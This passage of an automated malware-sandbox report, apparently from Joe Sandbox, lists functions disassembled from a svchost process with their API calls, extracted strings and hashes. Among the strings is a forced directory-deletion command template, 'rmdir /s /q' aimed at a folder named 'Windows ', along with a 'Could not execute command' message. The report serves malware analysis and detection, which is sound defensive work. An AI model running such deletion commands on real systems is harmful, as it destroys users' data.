            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: getenv
            • String ID: LANG$LC_ALL
            • API String ID: 498649692-1846429067
            • Opcode ID: 20105158b568c463e689491634bbafff3b6ecea8656e57f883d36d48775a029e
            • Instruction ID: 9fcd8caaeaea0ee29bcae651b0bc62379cbade15344a2b039fa1b902524f3055
            • Opcode Fuzzy Hash: 20105158b568c463e689491634bbafff3b6ecea8656e57f883d36d48775a029e
            • Instruction Fuzzy Hash: 1EE0129A74A34E5AFF56C726A95032516624B45755FCC4821C9BD067D0EB3CDCD4C320
            Function 6828C860 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
            Download Yara Rule
            APIs
            • GetSystemTimeAsFileTime.KERNEL32 ref: 6828C8A5
            • GetCurrentProcessId.KERNEL32 ref: 6828C8B0
            • GetCurrentThreadId.KERNEL32 ref: 6828C8B9
            • GetTickCount.KERNEL32 ref: 6828C8C1
            • QueryPerformanceCounter.KERNEL32 ref: 6828C8CE
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            • Opcode ID: 163e2e69cd60763563d8bbc24facd08ae0651081d2bf883fea85efff96d87309
            • Instruction ID: de8865f579cc78b3bd6f02289c46208b957763dd418be63745bf607111a9c14e
            • Opcode Fuzzy Hash: 163e2e69cd60763563d8bbc24facd08ae0651081d2bf883fea85efff96d87309
            • Instruction Fuzzy Hash: C1118F76215B4686FF514B2ABD1431572A2BB48BF5F449324DE9E437A4EF3DC498C300
            Function 68285E60 Relevance: 7.5, APIs: 6, Instructions: 48stringCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: memcpystrlen$mallocstrcmp
            • String ID:
            • API String ID: 1163645620-0
            • Opcode ID: 64da88bf9260b151aac8c6f81679060b510848f8e31d7b2236f5d9245c18b42d
            • Instruction ID: 78d0bbc60d57bc15763a2f0dcd48f46f4ca574966e799e0e4afdd3eef464d75e
            • Opcode Fuzzy Hash: 64da88bf9260b151aac8c6f81679060b510848f8e31d7b2236f5d9245c18b42d
            • Instruction Fuzzy Hash: 0A01B1B9A1260A55FD089B537E147A522D67718BC9FC48635CD7D47380EF3D80A54340
            Function 00007FFA417DD980 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 349COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            • Opcode ID: b669818d6fd76eb6236bb8158c58de1f356bcbf437198761ae71718b2b0a3390
            • Instruction ID: cc082e705ad211005c884fe9f11777d7f6629649fdcf4e034df7282586586e3a
            • Opcode Fuzzy Hash: b669818d6fd76eb6236bb8158c58de1f356bcbf437198761ae71718b2b0a3390
            • Instruction Fuzzy Hash: 76E1E422A0C78989EB13DB64D4403AC37B1FB86798F54C536DA8D13AEADF78D585CB04
            Function 00007FFA417DE510 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 343COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            • Opcode ID: b98627040e7af2f6bec60a68c32318b5a5ae9874b27b276746e180e1b806b762
            • Instruction ID: 688348f2ffde80b4030f36cf1fe04b1869a508695a8ce8c83707477d1ef3b1d6
            • Opcode Fuzzy Hash: b98627040e7af2f6bec60a68c32318b5a5ae9874b27b276746e180e1b806b762
            • Instruction Fuzzy Hash: 01E1C122F1C78985EB539B64D4403EC77B1FB46798F508535EA8D13AAADF38E481CB04
            Function 00007FFA417DE070 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 338COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            • Opcode ID: 98bc281ce655c37e3bda0c9e2928b925c60b61b6011ec35ff1395e0568f0fcf5
            • Instruction ID: ead50e58bfaed067ce3e2942fd754935f7fc026723e8075ccf7d869527433cd5
            • Opcode Fuzzy Hash: 98bc281ce655c37e3bda0c9e2928b925c60b61b6011ec35ff1395e0568f0fcf5
            • Instruction Fuzzy Hash: 9DE1B522B1CB8589EB13DB64D4402FC77B1FB46798F548635EA8D13AA6DF38E485CB04
            Function 00007FFA417D3A60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 337COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            • Opcode ID: 7cc811941c1fb50d3befd456af5ca11a1586a55ea6019b55bd54246be3d30f87
            • Instruction ID: 8a1dca523137f5811d087de391c6b58cc0c59e8e7ed8fc433ae7d52bbad9c4cb
            • Opcode Fuzzy Hash: 7cc811941c1fb50d3befd456af5ca11a1586a55ea6019b55bd54246be3d30f87
            • Instruction Fuzzy Hash: 1BE1E4A2A1C78985EB13DB69D5403BC77B1FB46784F508636DA8D13AAADF3CD481CB04
            Function 00007FFA417D4160 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            • Opcode ID: 720e63fb91445aab883460c7c1adc6bdae568dcbdfcc756b66b234cfe263b383
            • Instruction ID: 5e05fa3be1a52d6282d65b6fdd452f20b07c2f889c9d39180ed640db8f529520
            • Opcode Fuzzy Hash: 720e63fb91445aab883460c7c1adc6bdae568dcbdfcc756b66b234cfe263b383
            • Instruction Fuzzy Hash: FCE1D322A1C78989EB139B68D4403AC77B1FB46748F548635DA9E13EA6DF38E485CB04
            Function 00007FFA417D35C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            • Opcode ID: 1bbfd19f8f998657597786a590ada79d8602a5c018f3b504180f6c8455a00ab7
            • Instruction ID: 07981d98a946eacfa8154d746ef43dc6743d301ae897fc425d68cc7205257b57
            • Opcode Fuzzy Hash: 1bbfd19f8f998657597786a590ada79d8602a5c018f3b504180f6c8455a00ab7
            • Instruction Fuzzy Hash: 87E1E5A2A1CB8589EB139B68D5403BC77B1FB46798F508531EA8D13BA6DF3CD485CB04
            Function 00007FFA417DD310 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 316COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 909987262-960316848
            • Opcode ID: c9f260d61ed643ee0020667982cfd80f578e20fba3e4ae564ab49a746b166c6a
            • Instruction ID: 3adde8e2f02945ab9a47e230d92b185eeb7ef0965173ef6cd500870cba7443d5
            • Opcode Fuzzy Hash: c9f260d61ed643ee0020667982cfd80f578e20fba3e4ae564ab49a746b166c6a
            • Instruction Fuzzy Hash: 21D1A022A1C78985EB13DB68D4402AC37B1BB46798F54C536DA9D03AE6DF3CE485CB04
            Function 00007FFA4187C680 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: UTF-16LEUNICODE$UTF-8$ccs
            • API String ID: 3215553584-1196891531
            • Opcode ID: 1656e90cefeae376e4137237131b3a3211ac9752fb1cbe544bf4d9a83f633bf5
            • Instruction ID: 031d6b5caf274bdb6ba0bcd79d64c06e6fcec76b5258f3b1b27ebf82df80afb5
            • Opcode Fuzzy Hash: 1656e90cefeae376e4137237131b3a3211ac9752fb1cbe544bf4d9a83f633bf5
            • Instruction Fuzzy Hash: 45819D72E0C24385FBA7AF29C9502782AE0AB33B98F55C035DA2D572B5DB3DF9419341
            Function 00007FFA417F50A3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 198COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy
            • String ID: object separator
            • API String ID: 2453523683-3540986906
            • Opcode ID: 273c42d5532db4548d0d406cddef864a9afbdab41a96639a79d91a827c1e3081
            • Instruction ID: a4318861239ff24dbb6d40893401531944c023d58fb49db08b4c9260deb71aca
            • Opcode Fuzzy Hash: 273c42d5532db4548d0d406cddef864a9afbdab41a96639a79d91a827c1e3081
            • Instruction Fuzzy Hash: 08919662A1C58696EB03FF24D8512FE6371FB92394F809032EA4E475A7EF6CE245C744
            Function 00007FFA417EB8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy$_invalid_parameter_noinfo_noreturn
            • String ID: [json.exception.
            • API String ID: 2506729964-791563284
            • Opcode ID: 0b4264dd302c5115480fbaa9c3d19c487edde4a07e50b83b018bb4b84ec2d594
            • Instruction ID: 00c89c8a09363e5676080b146545fc6a06be7393683b3d32752537469e1ff9ae
            • Opcode Fuzzy Hash: 0b4264dd302c5115480fbaa9c3d19c487edde4a07e50b83b018bb4b84ec2d594
            • Instruction Fuzzy Hash: 82612B62E1C78581EB13AB25E04036D6BA1EB96BD4F508131EA8D07BA7DF7CE191CB44
            Function 00007FFA417F4F20 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy
            • String ID: value
            • API String ID: 2453523683-494360628
            • Opcode ID: dfe95ad3e7431e33f742c204382edc7092c176e07597a87b276e9937b38e5972
            • Instruction ID: 29940abc20cc8746660b0a5a77e1d41174dacfb67268c9044794cf02f9a4ac0c
            • Opcode Fuzzy Hash: dfe95ad3e7431e33f742c204382edc7092c176e07597a87b276e9937b38e5972
            • Instruction Fuzzy Hash: DD818462A1C946A5EB03FF60E8515EA6331FF92398F809032EA4D475A7EF6CE244C754
            Function 00007FFA417D0D00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: false$true
            • API String ID: 3668304517-2658103896
            • Opcode ID: 9253f4b6b74cc901d5cc9e6d17ec39d0ad503be1bab120bf3bc2affe9ed8bad8
            • Instruction ID: e6651af333d065beb34023c527a9728dfccd3c49da50f2ab220ce437532d2b4e
            • Opcode Fuzzy Hash: 9253f4b6b74cc901d5cc9e6d17ec39d0ad503be1bab120bf3bc2affe9ed8bad8
            • Instruction Fuzzy Hash: 7861C363B08B4999FB02EBB9D0402AC23B1AB497A8F509631CE5C277E9DF38D485C344
            Function 00007FFA417DBB10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: false$true
            • API String ID: 3668304517-2658103896
            • Opcode ID: a7c27b93a1bec8a471d51c992abbad75b865487630aacc83057df154db02c62b
            • Instruction ID: 7637cb74efa3250889492934523968a0fb1819b8f8380891c5a75bea0e41195e
            • Opcode Fuzzy Hash: a7c27b93a1bec8a471d51c992abbad75b865487630aacc83057df154db02c62b
            • Instruction Fuzzy Hash: FB619F22B08B8989FB52DF65D0403EC2370AB46798F148A35DE5D13BEADF38D486C708
            Function 00007FFA4184CD00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: : transaction is already closed.$Could not execute command $command
            • API String ID: 3668304517-2266251152
            • Opcode ID: 79a19450ce9c89397ead6c32e62a90c702805eb6a3794dd14f14e519b11bb324
            • Instruction ID: 831ff03141514f41c3b8df408bda97a08409658e7c11117d1c26195f912fdcef
            • Opcode Fuzzy Hash: 79a19450ce9c89397ead6c32e62a90c702805eb6a3794dd14f14e519b11bb324
            • Instruction Fuzzy Hash: 42517022B1CA8695FB13AB74D8452ED6331AF56798F548232EA4C166BAFF3CF545C300
            Function 00007FFA417E4790 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: exists$rmdir /s /q "{}Windows \"
            • API String ID: 3668304517-610943534
            • Opcode ID: 3f2633625133290c42000eb348ae0b26be593ebf0606f90bf460bfc5f863fe3d
            • Instruction ID: 1992151923b93cc5d07d2498f300b09d10744197a0f294a19b38c4417f248653
            • Opcode Fuzzy Hash: 3f2633625133290c42000eb348ae0b26be593ebf0606f90bf460bfc5f863fe3d
            • Instruction Fuzzy Hash: DE51B372B48B4299EB42EF74D4403EC33B1EB56798F409532EA5D53AAAEF34D590C344
